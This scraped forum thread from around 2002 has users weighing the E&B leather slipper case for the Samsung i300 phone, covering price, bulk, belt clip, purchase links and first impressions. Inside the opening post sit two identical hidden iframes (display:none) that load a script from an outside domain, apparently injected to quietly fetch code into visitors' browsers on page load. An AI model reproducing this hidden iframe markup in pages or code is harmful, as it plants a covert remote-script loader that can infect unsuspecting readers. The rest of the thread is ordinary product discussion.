+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

E & B Case

OK, there are at least a million threads on the E & B slipper case. I gotta ask - what's the big deal with this case? What makes it so great to ellicit such popularity?????

Just curious - always looking for better things.....!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

well,

the name..

he has some quiality cases.. he even owned the 6035 and form that he designed a case for it..

his cases are much better than the standard cases thatcome with the phone (hell, most off-brand cases are better too)..

he designed the case specificaly for the i300...

its a nice case, but hella $$$$$ ..

I havn't purchased yet, but I am turned off by most cases that just seem to damn bulky. If I wanted all that bulk I wouldn't have purchased the I300 for ease and convenience. True it is a hefty priced piece of equipment, but I've got the replaement program so.... From what I can tell from the website E&B specializes in minimalist cases that add little to no complications as convenience is not compromised. And is the calf skin?

Throwing in the towel...

I just ordered the damn case.

It's a sickness I tell ya!!
    I thought grafitti was illegal?

Administrator

Arrow

if i could find one on ebay, i might get it..

but...

since cs is going to get one... damn hes influencing me!!! :o :p

honey... hide the credit cards from meeeeeeeeeee......!!!!!!!!!!!!!!!!!

Where's E&B

Where do I find E&B? I assume that they're on the Net somewhere. Thanks:p

www.ebcases.com

HTH....

Administrator

Arrow Re: Where's E&B

Originally posted by Gruss
    Where do I find E&B? I assume that they're on the Net somewhere. Thanks:p
    EB Main Page

specifically

here .

comes with or withuot a belt clip.

Last edited by Marctronixx; 01-16-2002 at 08:51 PM.

Has anyone actually used one?

Thanks to Mactronixx and Csherman for the pointer to E& B. Has anyone here actually used this case? It's damned expensive all right. So, before I put down even more of my (now quickly) disposal income on this I300, I guess I'd like to know if it's worth it. I've had my phone for just about a week now and I like it except for the bulky case. But I don't want to carry it unprotected. By the way, as of today, E&B's website says that the slipper case is on back order. If anyone has any experience with this case, please speak up. Thanks again.

I'd like to ask that Marty or some of the other owners post an image of the case closed. Some are more bulky and not as sleek as others. This would be the last bit of info I'd need to make my decision.

User ***** Rulz Enforcer

Exclamation is it bulky?

is the e/b case less bulky than the one that comes w/ the phone or the same?

I'd only get it if it was siginificantly less bulky...

perhaps there could be some compare and contract pics??

thx

chris

extremely less bulky

My business partner received his about 1 hour ago! Timely, heh?

It is very cool, smells nice, beautiful leather, etc. I own the Samsung alligator case which is great as far as functionality, but every time you bump against something, is scars. The E&B is a bit thicker when it has the unit in it, but it is lighter, and more functional as you can talk on the phone while it is in the case. It also has a superior belt clip to the Samsung case.

The only thing I don't like about it is that you have to remove it from the case to put on the cradle. Because my phone is on the cradle the entire day anyway, this isn't a big deal to me. For others, it may be a bit of a nuisance.

Overall, I think it is a great case. Looking forward to receiving mine -- hopefully before the end of the quarter! :p

Craig

Originally posted by mjorange
    extremely less bulky
    MJ,

I agree it is less "bulky", but I do think that when you put them side by side, the EB is thicker. Agree?

Craig

chk
    Does the belt clip add much girth to the unit? I.E.....could I put my I300 in my pocket as easily with the belt clip version of the case as I could with the model that does not have the belt clip?
    Thanks....

I would say no. While it doesn't add "girth" per say or weight, it certainly would make it harder to squeeze into a pocket. Just my opinion....

Craig

Administrator

Arrow

gruss,

you can go to tar-zay (target) and g et the sanyo case.. it on another thread here.. its very nice and priced right... 10 bucks...

you guys can click on the pic at eb's site and it wil show several pics of the case...

Just got my case in the mail today and so far I love it. Do not have to keep the phone in my pocket anymore.

got the slipper w/clip today. some first impressions:

-fits very snuggly, don't have the extended batt but would imagine that it would not be a good fit.
    -plastic window at the top of case is a piece of junk and warped - kinda like looking out a plastic rear window of a convertible.

-the fit with the antenna is not that great; probably of no consequence for those who removed the antenna.

-cut outs for the buttons don't match up precisely, and because the case is made up of multiple sewn leather pieces, the cut outs appear warped. bear in mind that i'm a collector of mechanical wristwatches, and appreciate finely finished movements - there is no comparison b/t a $10,000 patek (no i don't have one yet) and a $40 e&b slipper case.

-having just made only one call so far...the flip factor of the case didn't seem so intrusive or annoying, but only time will tell.

-agree, maybe just a skoach thicker than the samsung crocodile case. same height.

-worth $40? you betcha, and imo an improvement over the original and samsung cases.

heres some pics...left to right: original, samsung croc, and e&b cases.
    Attached Images  

hmm, not letting me attach pics...
    Attached Images